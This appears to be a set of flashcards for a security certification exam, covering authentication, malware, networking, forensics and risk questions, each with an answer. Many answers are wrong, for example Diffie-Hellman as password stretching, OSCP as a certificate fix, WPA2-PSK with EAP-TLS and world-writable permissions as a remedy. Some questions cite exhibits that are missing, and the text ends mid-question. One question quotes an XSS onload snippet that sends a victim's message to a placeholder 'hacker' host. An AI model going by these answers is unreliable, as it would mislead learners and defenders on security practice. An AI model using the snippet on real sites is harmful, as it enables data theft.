Topic 5 Flashcards
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive
cannot be reused. Which of the following method should the technician use?
Shredding Wiping Low-level formatting Repartitioning Overwriting
Shredding
An organization’s employees currently use three different sets of credentials to access multiple internal
resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?
Transitive trust
Single sign-on
Federation
Secure token
Single Sign on
Students at a residence hall are reporting Internet connectivity issues. The university’s network administrator configured the residence hall’s network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall’s network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?
Router ACLs
BPDU guard
Flood guard
DHCP snooping
DHCP snooping
Which of the following is a major difference between XSS attacks and remote code exploits?
XSS attacks use machine language, while remote exploits use interpreted language
XSS attacks target servers, while remote code exploits target clients
Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only
Remote code exploits allow writing code at the client side and executing it, while XSS attacks require
no code to work
XSS attacks use machine language, while remote exploits use interpreted language
An attachment that was emailed to finance employees contained an embedded message. The security
administrator investigates and finds the intent was to conceal the embedded information from public view.
Which of the following BEST describes this type of message?
Obfuscation
Stenography
Diffusion
BCRYPT
Obfuscation
Which of the following locations contain the MOST volatile data?
SSD
Paging file
RAM
Cache memory
Cache memory
An incident response analyst at a large corporation is reviewing proxy data log. The analyst believes a
malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO).
Which of the following is the best NEXT step for the analyst to take?
Call the CEO directly to ensure awareness of the event
Run a malware scan on the CEO’s workstation
Reimage the CEO’s workstation
Disconnect the CEO’s workstation from the network
Disconnect the CEO’s workstation from the network
Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed?
Nonce Salt OTP Block cipher IV
Salt
A systems administrator found a suspicious file in the root of the file system. The file contains URLs,
usernames, passwords, and text from other documents being edited on the system. Which of the following
types of malware would generate such a file?
Keylogger
Rootkit
Bot
RAT
Keylogger
A company utilizes 802.11 for all client connectivity within a facility. Users in one part of the building are
reporting they are unable to access company resources when connected to the company SSID.
Which of the following should the security administrator use to assess connectivity?
Sniffer
Honeypot
Routing tables
Wireless scanner
Routing tables
An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential
incidents in the company. The vertical axis indicates the likelihood or an incident, while the horizontal axis
indicates the impact.
Which of the following is this table an example of?
Internal threat assessment
Privacy impact assessment
Qualitative risk assessment
Supply chain assessment
Qualitative risk assessment
Legal authorities notify a company that its network has been compromised for the second time in two years.
The investigation shows the attackers were able to use the same vulnerability on different systems in both
attacks. Which of the following would have allowed the security team to use historical information to protect
against the second attack?
Key risk indicators
Lessons learned
Recovery point objectives
Tabletop exercise
Lessons learned
An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?
Use a protocol analyzer to reconstruct the data and implement a web-proxy.
Deploy a web-proxy and then blacklist the IP on the firewall.
Deploy a web-proxy and implement IPS at the network edge.
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor.
Which of the following BEST describes this forensic concept?
Legal hold
Chain of custody
Order of volatility
Data acquisition
Legal hold
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a
requirement for this configuration?
Setting up a TACACS+ server
Configuring federation between authentication servers
Enabling TOTP
Deploying certificates to endpoint devices
Deploying certificates to endpoint devices
Which of the following uses tokens between the identity provider and the service provider to authenticate and authorize users to resources?
RADIUS
SSH
OAuth
MSCHAP
OAuth
Which of the following is an example of resource exhaustion?
A penetration tester requests every available IP address from a DHCP server.
An SQL injection attack returns confidential data back to the browser.
Server CPU utilization peaks at 100% during the reboot process.
System requirements for a new software package recommend having 12GB of RAM, but only BGB are available.
A penetration tester requests every available IP address from a DHCP server
A company recently updated its website to increase sales. The new website uses PHP forms for leads and
provides a directory with sales staff and their phone numbers. A systems administrator is concerned with the new website and provides the following log to support the concern:
Which of the following is the systems administrator MOST likely to suggest to the Chief Information Security Officer (CISO) based on the above?
Changing the account standard naming convention
Implementing account lockouts
Discontinuing the use of privileged accounts
Increasing the minimum password length from eight to ten characters
Changing the account standard naming convention
An organization’s Chief Executive Officer (CEO) directs a newly hired computer technician to install an OS
on the CEO’s personal laptop. The technician performs the installation, and a software audit later in the month indicates a violation of the EULA occurred as a result.
Which of the following would address this violation
going forward?
Security configuration baseline
Separation of duties
AUP
NDA
AUP (acceptable use policy)
A security administrator is implementing a secure method that allows developers to place files or objects onto a Linux Server. Developers are required to log in using a username, password, and asymmetirc key. Which of the following protocols should be implemented?
ssl/tls
sftp
srtp
ipsec
SFTP
A network technician is designing a network for a small company. The network technician needs to implement
an email server and web server that will be accessed by both internal employees and external customers.
Which of the following would BEST secure the internal network and allow access to the needed servers?
Implementing a site-to-site VPN for server access.
Implementing a DMZ segment for the server.
Implementing NAT addressing for the servers.
Implementing a sandbox to contain the servers.
Implementing a DMZ segment for the server
A Chief Information Officer (CIO) asks the company’s security specialist if the company should spend any
funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?
$500
$1000
$2000
$2500
$500
A security auditor is reviewing the following output from file integrity monitoring software installed on a very busy server at a large service provider. The server has not been updates since it was installed. Drag and drop the log entry that identifies the first instance of server compromise.
Page 229
1/1/2017 3:30:00
Which of the following control types would a backup of server data provide in case of a system issue?
Corrective
Deterrent
Preventive
Detective
Corrective
A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?
Domain hijacking
Injection
Buffer overflow
Privilege escalation
Privilege escalation
A security administrator suspects that a DDoS attack is affecting the DNS server. The administrator accesses a
workstation with the hostname of workstation01 on the network and obtains the following output from the
ipconfig command:
The administrator successfully pings the DNS server from the workstation. Which of the following commands
should be issued from the workstation to verify the DDoS attack is no longer occurring?
dig www.google.com
dig 192.168.1.254
dig workstation01.com
dig 192.168.1.26
dig workstation01.com
After reports of slow internet connectivity, a technician reviews the following logs from a server’s host-based
firewall:
Which of the following can the technician conclude after reviewing the above logs?
The server is under a DDoS attack from multiple geographic locations.
The server is compromised, and is attacking multiple hosts on the Internet.
The server is under an IP spoofing resource exhaustion attack.
The server is unable to complete the TCP three-way handshake and send the last ACK.
The server is under an IP spoofing resource exhaustion attack.
A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized.
Which of the following solutions would BEST meet these requirements?
Multifactor authentication SSO Biometrics PKI Federation
SSO
An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?
Faraday cage
Air gap
Mantrap
Bollards
Mantrap
A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system
logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the
C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look
suspicious.
One of the files contains the following commands:
Which of the following types of malware was used?
Worm
Spyware
Logic bomb
Backdoor
Backdoor
A recent penetration test revealed several issues with a public-facing website used by customers. The testers were able to:
- Enter long lines of code and special characters
- Crash the system
- Gain unauthorized access to the internal application server
- Map the internal network
The development team has stated they will need to rewrite a significant portion of the code used, and it will take more than a year to deliver the finished product. Which of the following would be the BEST solution to introduce in the interim?
Content fileting WAF TLS IPS/IDS UTM
UTM (unified threat management)
Which of the following scenarios BEST describes an implementation of non-repudiation?
A user logs into a domain workstation and access network file shares for another department
A user remotely logs into the mail server with another user’s credentials
A user sends a digitally signed email to the entire finance department about an upcoming meeting
A user access the workstation registry to make unauthorized changes to enable functionality within an
application
A user sends a digitally signed email to the entire finance department about an upcoming meeting.
A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take the chain of custody?
Make a forensic copy
Create a hash of the hard drive
Recover the hard drive data
Update the evidence log
Update the evidence log
As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the Internet in a secure manner. Which of the following protocols would BEST meet this objective? (Choose two.)
LDAPS SFTP HTTPS DNSSEC SRTP
SFTP
HTTPS
A security specialist is notified about a certificate warning that users receive when using a new internal
website. After being given the URL from one of the users and seeing the warning, the security specialist
inspects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site.
Which of the following would BEST resolve the issue?
OSCP
OID
PEM
SAN
OSCP (Offensive Security Certified Professional)
A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against
intranet services. The scan reports include the following critical-rated vulnerability:
Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0)
Threat actor: any remote user of the web server
Confidence: certain
Recommendation: apply vendor patches
Which of the following actions should the security analyst perform FIRST?
Escalate the issue to senior management.
Apply organizational context to the risk rating.
Organize for urgent out-of-cycle patching.
Exploit the server to check whether it is a false positive.
Apply organizational context to the risk rating
A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users.
Which of the following BEST represents the required cloud deployment model?
SaaS IaaS MaaS Hybrid Private
SaaS (Security-as-a-service)
An organization is developing its mobile device management policies and procedures and is concerned about vulnerabilities associated with sensitive data being saved to a mobile device, as well as weak authentication when using a PIN As part or discussions on the topic several solutions are proposed Which of the following controls when required together, will address the protection of data at-rest as well as strong authentication? (Select TWO).
Containerization FDE Remote wipe capability MDM MFA OTA updates
Containerization
and
FDE (full disk encryption)
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the
requirement, which of the following should the security analyst do to MINIMIZE the risk?
Enable CHAP
Disable NTLM
Enable Kerebos
Disable PAP
Disable NTLM (New Technology LAN Manager)
A network administrator is brute forcing accounts through a web interface. Which of the following would
provide the BEST defense from an account password being discovered?
Password history
Account lockout
Account expiration
Password complexity
Account lockout
A security analyst is assessing a small company’s internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Choose two.)
Compare configurations against platform benchmarks
Confirm adherence to the company’s industry-specific regulations
Review the company’s current security baseline
Verify alignment with policy related to regulatory compliance
Run an exploitation framework to confirm vulnerabilities
Review the company’s current security baseline
and
Run an exploitation framework to confirm vulnerabilities
A security administrator is performing a risk assessment on a legacy WAP with a WEP-enabled wireless infrastructure. Which of the following should be implemented to harden the infrastructure without upgrading the WAP?
Implement WPA and TKIP
Implement WPS and an eight-digit pin
Implement WEP and RC4
Implement WPA2 Enterprise
Implement WPA2 Enterprise
An organization is looking to build its second head office another city, which has a history flooding with an
average of two flooding every 100 years. The estimated building cost is $1 million, an the estimated damage due to flooding is half of the building’s cost. Given this information, which of the following is the SLE?
$50,000
$250,000
$500,000
$1,000,000
$500,000
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message
indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the
organization lose the ability to open files on the server.
Which of the following has MOST likely occurred? (Choose three.)
Crypto-malware Adware Botnet attack Virus Ransomware Backdoor DDoS attack
Crypto-malware
Virus
Ransomware
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?
Accounting
Authorization
Authentication
Identification
Accounting
Which of the following components of printers and MFDs are MOST likely to be used as vectors of
compromise if they are improperly configured?
Embedded web server
Spooler
Network interface
LCD control panel
Embedded web server
Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet?
Design weakness
Zero-day
Logic bomb
Trojan
Zero-day
Which of the following BEST explains why a development environment should have the same database server secure baseline that exist in production even if there is no PII in the database?
Without the same configuration in both development and production, there are no assurance that
changes made in development will have the same effect in production.
Attackers can extract sensitive, personal information from lower development environment databases
just as easily as they can from production databases.
Databases are unique in their need to have secure configurations applied in all environment because they
are attacked more often.
Laws stipulate that databases with the ability to store personal information must be secured regardless of
the environment or if they actually have PIL.
Laws stipulate that databases with the ability to store personal information must be secured regardless of the environment or if they actually have PIL
A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO)
TOPT SCP FTP over a non-standard pot SRTP Certificate-based authentication SNMPv3
FTP over a non-standard port
and
Certificate-based authentication
Which of the following would provide additional security by adding another factor to a smart card?
Token
Proximity badge
Physical key
PIN
PIN
A company wants to implement a wireless network with the following requirements:
All wireless users will have a unique credential.
User certificates will not be required for authentication.
The company’s AAA infrastructure must be utilized.
Local hosts should not store authentication tokens.
Which of the following should be used in the design to meet the requirements?
EAP-TLS
WPS
PSK
PEAP
PEAP (protected extensible authentication protocol)
A security analyst identified an SQL injection attack.
Which of the following is the FIRST step in remediating the vulnerability?
Implement stored procedures.
Implement proper error handling.
Implement input validations.
Implement a WAF.
Implement input validations
A security administrator wants to implement least privilege access for a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data and implementing
discretionary access control. The following controls are available:
Read = A user can read the content of an existing file. White = A user can modify the content of an existing file and delete an existing file. Create = A user can create a new file and place data within the file.
A missing control means the user does not have that access. Which of the following configurations provides
the appropriate control to support the organization/s requirements?
A. Owners: Read, Write, CreateGroup Members: Read, WriteOthers: Read, Create
B. Owners: Read, CreateGroup Members: Read, Write, CreateOthers: Read
C. Owners: Read, WriteGroup Members: Read, CreateOthers: Read, Create
D. Owners: Write, CreateGroup Members: Read, CreateOthers: Read, Write, Create
A. Owners: Read, Write, CreateGroup
Members: Read, Write
Others: Read, Create
A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item as checkout. Which of the following BEST describes this type of user?
Insider Script kiddie Competitor Hacktivist APT
Script kiddie
After a security assessment was performed on the enterprise network, it was discovered that:
Configuration changes have been made by users without the consent of IT.
Network congestion has increased due to the use of social media.
Users are accessing file folders and network shares that are beyond the scope of their need to know.
Which of the following BEST describe the vulnerabilities that exist in this environment? (Choose two.)
Poorly trained users Misconfigured WAP settings Undocumented assets Improperly configured accounts Vulnerable business processes
Poorly trained users
and
Improperly configured accounts
A company recently experienced data exfiltration via the corporate network. In response to the breach, a
security analyst recommends deploying an out-of-band IDS solution. The analyst says the solution can be
implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS?
Network tap
Network proxy
Honeypot
Port mirroring
Port mirroring
An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and
identity proofing. The goal of the account management policy is to ensure the highest level of security while
providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners?
Guest account User account Shared account Privileged user account Default account Service account
Privileged user account
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST
solutions for the organization? (Select TWO)
TACACS+ CHAP LDAP RADIUS MSCHAPv2
TACACS+
and
RADIUS
Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann’s access and checks the SIEM for any errors. The security analyst reviews the log file from Ann’s system and notices the following output:
Which of the following is MOST likely preventing Ann from accessing the application from the desktop?
Web application firewall DLP Host-based firewall UTM Network-based firewall
Host-based firewall
A security administrator is analyzing a user report in which the computer exhibits odd network-related
outages. The administrator, however, does not see any suspicious process running. A prior technician’s notes
indicate the machine has been remediated twice, but the system still exhibits odd behavior. Files were deleted from the system recently.
Which of the following is the MOST likely cause of this behavior?
Crypto-malware
Rootkit
Logic bomb
Session hijacking
Rootkit
A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?
Wildcard certificate
Extended validation certificate
Certificate chaining
Certificate utilizing the SAN file
Certificate utilizing the SAN (subject alternate names) file
An office recently completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include:
Intellectual property
Payroll records
Financial information
Drug screening results
Which of the following is the BEST way to dispose of these items?
Shredding
Pulping
Deidentifying
Recycling
Pulping
A security analyst is hardening a large-scale wireless network. The primary requirements are the following:
Must use authentication through EAP-TLS certificates
Must use an AAA server
Must use the most secure encryption protocol
Given these requirements, which of the following should the analyst implement and recommend? (Select
TWO.)
802.1X
802.3
LDAP
TKIP
CCMP
WPA2-PSK
802.1X
and
WPA2-PSK
A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and
moving all heavy applications and storage to a centralized server that hosts all of the company’s required desktop applications. Which of the following describes the BEST deployment method to meet these
requirements?
IaaS
VM sprawl
VDI
PaaS
VDI
Ann, a customer, is reporting that several important files are missing from her workstation. She recently
received communication from an unknown party who is requesting funds to restore the files. Which of the
following attacks has occurred?
Ransomware
Keylogger
Buffer overflow
Rootkit
Ransomware
Which of the following needs to be performed during a forensics investigation to ensure the data contained in
a drive image has not been compromised?
Follow the proper chain of custody procedures.
Compare the image hash to the original hash.
Ensure a legal hold has been placed on the image.
Verify the time offset on the image file.
Compare the image hash to the original hash
An administrator is implementing a secure web server and wants to ensure that if the web server application is compromised, the application does not have access to other parts of the server or network. Which of the
following should the administrator implement? (Choose two.)
Mandatory access control Discretionary access control Rule-based access control Role-based access control Attribute-based access control
Mandatory access control
and
Rule-based access control
Users are attempting to access a company’s website but are transparently redirected to another websites. The users confirm the URL is correct. Which of the following would BEST prevent this issue in the future?
DNSSEC
HTTPS
IPSec
TLS/SSL
DNSSEC
A network technician is setting up a new branch for a company. The users at the new branch will need to
access resources securely as if they were at the main location. Which of the following networking concepts
would BEST accomplish this?
Virtual network segmentation Physical network segmentation Site-to-site VPN Out-of-band access Logical VLANs
Site-to-site VPN
The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?
The password expired on the account and needed to be reset
The employee does not have the rights needed to access the database remotely
Time-of-day restrictions prevented the account from logging in
The employee’s account was locked out and needed to be unlocked
Time of date restrictions prevented the account from logging in
A customer calls a technician and needs to remotely connect to a web server to change some code manually. The technician needs to configure the user’s machine with protocols to connect to the Unix web server, which is behind a firewall. Which of the following protocols does the technician MOST likely need to configure?
SSH
SFTP
HTTPS
SNMP
SSH
Which of the following are used to substantially increase the computation time required to crack a password? (Choose two.)
BCRYPT Substitution cipher ECDHE PBKDF2 Diffie-Hellman
BCRYPT
and
Diffie-Hellman
An organization wants to ensure network access is granted only after a user or device has been authenticated.
Which of the following should be used to achieve this objective for both wired and wireless networks?
CCMP
PKCS#12
IEEE 802.1X
OCSP
IEEE 802.1x
Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet?
Design weakness
Zero-day
Logic bomb
Trojan
Zero-day
A small company’s Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the
company’s security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST?
Survey threat feeds from services inside the same industry.
Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic
Conduct an internal audit against industry best practices to perform a qualitative analysis.
Deploy a UTM solution that receives frequent updates from a trusted industry vendor.
Survey threat feeds from services inside the same industry
A company has purchased a new SaaS application and is in the process of configuring it to meet the
company’s needs. The director of security has requested that the SaaS application be integrated into the company’s IAM processes. Which of the following configurations should the security administrator set up in order to complete this request?
LDAP
RADIUS
SAML
NTLM
RADIUS
A security administrator is developing a methodology for tracking staff access to patient data. Which of
the following would be the BEST method of creating audit trails for usage reports?
Deploy file integrity checking
Restrict access to the database by following the principle of least privilege
Implementing a database activity monitoring system
Created automated alerts on the IDS system for the database server
Implementing a database activity monitoring system
A recent internal audit is forcing a company to review each internal business unit’s VMs because the cluster
they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?
Buffer overflow
End-of-life systems
System sprawl
Weak configuration
System sprawl
A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the
antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?
RAT
Worm
Ransomware
Bot
RAT
A security administrator wants to determine if a company’s web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted?
Non-credentialed Passive Port Credentialed Red team Active
Credentialed
A company has won an important government contract. Several employees have been transferred from their existing projects to support a new contract. Some of the employees who have transferred will be working long hours and still need access to their project information to transition work to their replacements.
Which of the following should be implemented to validate that the appropriate offboarding process has been followed?
Separation of duties
Time-of-day restrictions
Permission auditing
Mandatory access control
Permission auditing
See PDF 253
PDF 253
A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer?
Round-robin
Weighted
Least connection
Locality-based
Locality-based
Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack.
Which of the following is considered to be a corrective action to combat this vulnerability?
Install an antivirus definition patch Educate the workstation users Leverage server isolation Install a vendor-supplied patch Install an intrusion detection system
Install a vendor-supplied patch
A security administrator is investigating many recent incident of credential theft for users accessing the
company’s website, despite the hosting web server requiring HTTPS for access. The server’s logs show the
website leverages the HTTP POST method for carrying user authentication details.
Which of the following is the MOST likely reason for compromise?
The HTTP POST method is not protected by HTTPS.
The web server is running a vulnerable SSL configuration.
The company does not support DNSSEC.
The HTTP response is susceptible to sniffing.
The HTTP POST method is not protected by HTTPS
Which of the following enables sniffing attacks against a switched network?
ARP poisoning
IGMP snooping
IP spoofing
SYN flooding
ARP poisoning
An attacker exploited a vulnerability on a mail server using the code below.
onload=document.location.replace
(‘‘http://hacker/post.asp?victim?message =’
Which of the following BEST explains what the attacker is doing?
The attacker is replacing a cookie.
The attacker is stealing a document.
The attacker is replacing a document.
The attacker is deleting a cookie.
The attacker is replacing a document
An organization wants to implement a method to correct risks at the system/application layer. Which of the following is the BEST method to accomplish this goal?
IDS/IPS
IP tunneling
Web application firewall
Patch management
Web application firewall
An application developer has neglected to include input validation checks in the design of the company’s new web application. An employee discovers that repeatedly submitting large amounts of data, including custom code, to an application will allow the execution of the custom code at the administrator level. Which of the following BEST identifies this application attack?
Cross-site scripting
Clickjacking
Buffer overflow
Replay
Buffer overflow
Which of the following types of security testing is the MOST cost-effective approach used to analyze existing
code and identity areas that require patching?
Black box
Gray box
White box
Red team
White box
A company is performing an analysis of the corporate enterprise network with the intent of identifying any one system, person, function, or service that, when neutralized, will cause or cascade disproportionate damage to the company’s revenue, referrals, and reputation.
Which of the following an element of the BIA that this action is addressing?
Identification of critical systems
Single point of failure
Value assessment
Risk register
Identification of critical systems
A group of developers is collaborating to write software for a company. The developers need to work in subgroups and control who has access to their modules. Which of the following access control methods is considered user-centric?
Time-based
Mandatory
Rule-based
Discretionary
Discretionary
An organization has several production-critical SCADA supervisory systems that cannot follow the normal
30-day patching policy. Which of the following BEST maximizes the protection of these systems from
malicious software?
Configure a firewall with deep packet inspection that restricts traffic to the systems.
Configure a separate zone for the systems and restrict access to known ports.
Configure the systems to ensure only necessary applications are able to run.
Configure the host firewall to ensure only the necessary applications have listening ports
Configure a firewall with deep packet inspection that restricts traffic to the systems.
Which of the following is an asymmetric function that generates a new and separate key every time it runs?
RSA DSA DHE HMAC PBKDF2
DHE (Ephemeral Diffie-Hellman)
Which of the following authentication concepts is a gait analysis MOST closely associated?
Somewhere you are
Something you are
Something you do
Something you know
Something you do
Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application?
Sandboxing
Encryption
Code signing
Fuzzing
Sandboxing
A systems administrator has isolated an infected system from the network and terminated the malicious
process from executing. Which of the following should the administrator do NEXT according to the incident
response process?
Restore lost data from a backup.
Wipe the system.
Document the lessons learned.
Determine the scope of impact.
Restore lost data from a backup
A systems administrator needs to integrate multiple IoT and small embedded devices into the company’s
wireless network securely. Which of the following should the administrator implement to ensure low-power and legacy devices can connect to the wireless network?
WPS
WPA
EAP-FAST
802.1X
WPS (wifi protected setup)
Which of the following BEST describes the purpose of authorization?
Authorization provides logging to a resource and comes after authentication.
Authorization provides authentication to a resource and comes after identification.
Authorization provides identification to a resource and comes after authentication.
Authorization provides permissions to a resource and comes after authentication.
Authorization provides permissions to a resource and comes after authentication.
A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a
specific version of a technology the company uses to support many critical application. The CIO wants to
know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?
Penetration test
Vulnerability scan
Active reconnaissance
Patching assessment report
Penetration test
Joe, a user, reports to the help desk that he can no longer access any documents on his PC. He states that he saw a window appear on the screen earlier, but he closed it without reading it. Upon investigation, the
technician sees high disk activity on Joe’s PC. Which of the following types of malware is MOST likely
indicated by these findings?
Keylogger
Trojan
Rootkit
Crypto-malware
Crypto-walmare
A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The
user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case?
The certificate has expired
The browser does not support SSL
The user’s account is locked out
The VPN software has reached the seat license maximum
The certificate has expired
Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices
on their home networks?
Power off the devices when they are not in use,
Prevent IoT devices from contacting the Internet directly.
Apply firmware and software updates upon availability.
Deploy a bastion host on the home network.
Apply firmware and software updates upon availability
A security consultant is setting up a new electronic messaging platform and wants to ensure the platform
supports message integrity validation.
Which of the following protocols should the consultant recommend?
S/MIME
DNSSEC
RADIUS
802.11x
S/MIME
A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy?
Physical
Corrective
Technical
Administrative
Administrative
A call center company wants to implement a domain policy primarily for its shift workers. The call center has
large groups with different user roles. Management wants to monitor group performance. Which of the
following is the BEST solution for the company to implement?
Reduced failed logon attempts
Mandatory password changes
Increased account lockout time
Time-of-day restrictions
Time-of-day restrictions
A company has migrated to two-factor authentication for accessing the corporate network, VPN, and SSO.
Several legacy applications cannot support multifactor authentication and must continue to use usernames and passwords. Which of the following should be implemented to ensure the legacy applications are as secure as possible while ensuring functionality? (Choose two.)
Priveleged accounts Password reuse restrictions Password complexity requirements Password recovery Account disablement
Password complexity requirements
and
Account disablement
After discovering the /etc/shadow file had been rewritten, a security administrator noticed an application insecurely creating files in / tmp.
Which of the following vulnerabilities has MOST likely been exploited?
Privilege escalation
Resource exhaustion
Memory leak
Pointer dereference
Priv Escalation
A company offers SaaS, maintaining all customers’ credentials and authenticating locally. Many large
customers have requested the company offer some form of federation with their existing authentication
infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?
Implement SAML so the company’s services may accept assertions from the customers’ authentication
servers.
Provide customers with a constrained interface to manage only their users’ accounts in the company’s
active directory server.
Provide a system for customers to replicate their users’ passwords from their authentication service to
the company’s.
Use SOAP calls to support authentication between the company’s product and the customers’
authentication servers.
Implement SAML so the company’s services may accept assertions from the customers’ authentication
servers.
An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned
network can be seen sending packets to the wrong gateway.
Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?
Firewall; implement an ACL on the interface
Router; place the correct subnet on the interface
Switch; modify the access port to trunk port
Proxy; add the correct transparent interface
Router; place the correct subnet on the interface
Which of the following is used to encrypt web application data?
MD5
AES
SHA
DHA
AES (Advanced Encryption Standard)
A user from the financial aid office is having trouble interacting with the finaid directory on the university’s
ERP system. The systems administrator who took the call ran a command and received the following output:
Subsequently, the systems administrator has also confirmed the user is a member of the finaid group on the ERP system.
Which of the following is the MOST likely reason for the issue?
The permissions on the finaid directory should be drwxrwxrwx.
The problem is local to the user, and the user should reboot the machine.
The files on the finaid directory have become corrupted.
The finaid directory is not formatted correctly
The permissions on the finaid directory should be drwxrwxrwx.
A technician has been asked to document which services are running on each of a collection of 200 servers.
Which of the following tools BEST meets this need while minimizing the work required?
Nmap
Nslookup
Netcat
Netstat
Netstat
Joe, a member of the sales team, recently logged into the company servers after midnight local time to
download the daily lead form before his coworkers did. Management has asked the security team to provide a
method for detecting this type of behavior without impeding the access for sales employee as they travel
overseas.
Which of the following would be the BEST method to achieve this objective?
Configure time-of-day restrictions for the sales staff.
Install DLP software on the devices used by sales employees.
Implement a filter on the mail gateway that prevents the lead from being emailed.
Create an automated alert on the SIEM for anomalous sales team activity.
Create an automated alert on the SIEM for anomalous sales team activity
Which of the following methods is used by internal security teams to assess the security of internally
developed applications?
Active reconnaissance
Pivoting
White box testing
Persistence
White box testing
Two users must encrypt and transmit large amounts of data between them. Which of the following should they
use to encrypt and transmit the data?
Symmetric algorithm
Hash function
Digital signature
Obfuscation
Symmetric algorithm
Management wants to ensure any sensitive data on company-provided cell phones is isolated in a single
location that can be remotely wiped if the phone is lost. Which of the following technologies BEST meets this
need?
Geofencing
Containerization
Device encryption
Sandboxing
Containerization
While troubleshooting a client application connecting to the network, the security administrator notices the
following error: Certificate is not valid. Which of the following is the BEST way to check if the digital
certificate is valid?
PKI
CRL
CSR
IPSec
CRL
An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently
has 500 PCs active on the network. the Chief Information Security Officer (CISO) suggests that the
organization employ desktop imaging technology for such a large scale upgrade. Which of the following is a
security benefit of implementing an imaging solution?
it allows for faster deployment
it provides a consistent baseline
It reduces the number of vulnerabilities
It decreases the boot time
It provides a consistent baseline
A number of employees report that parts of an ERP application are not working. The systems administrator
reviews the following information from one of the employee workstations:
Execute permission denied: financemodule.dll
Execute permission denied: generalledger.dll
Which of the following should the administrator implement to BEST resolve this issue while minimizing risk and attack exposure?
Update the application blacklist
Verify the DLL’s file integrity
Whitelist the affected libraries
Place the affected employees in the local administrator’s group
Whitelist the affected libraries
Which of the following is a deployment concept that can be used to ensure only the required OS access is
exposed to software applications?
Staging environment
Sandboxing
Secure baseline
Trusted OS
Sandboxing
A security analyst is attempting to identify vulnerabilities in a customer’s web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?
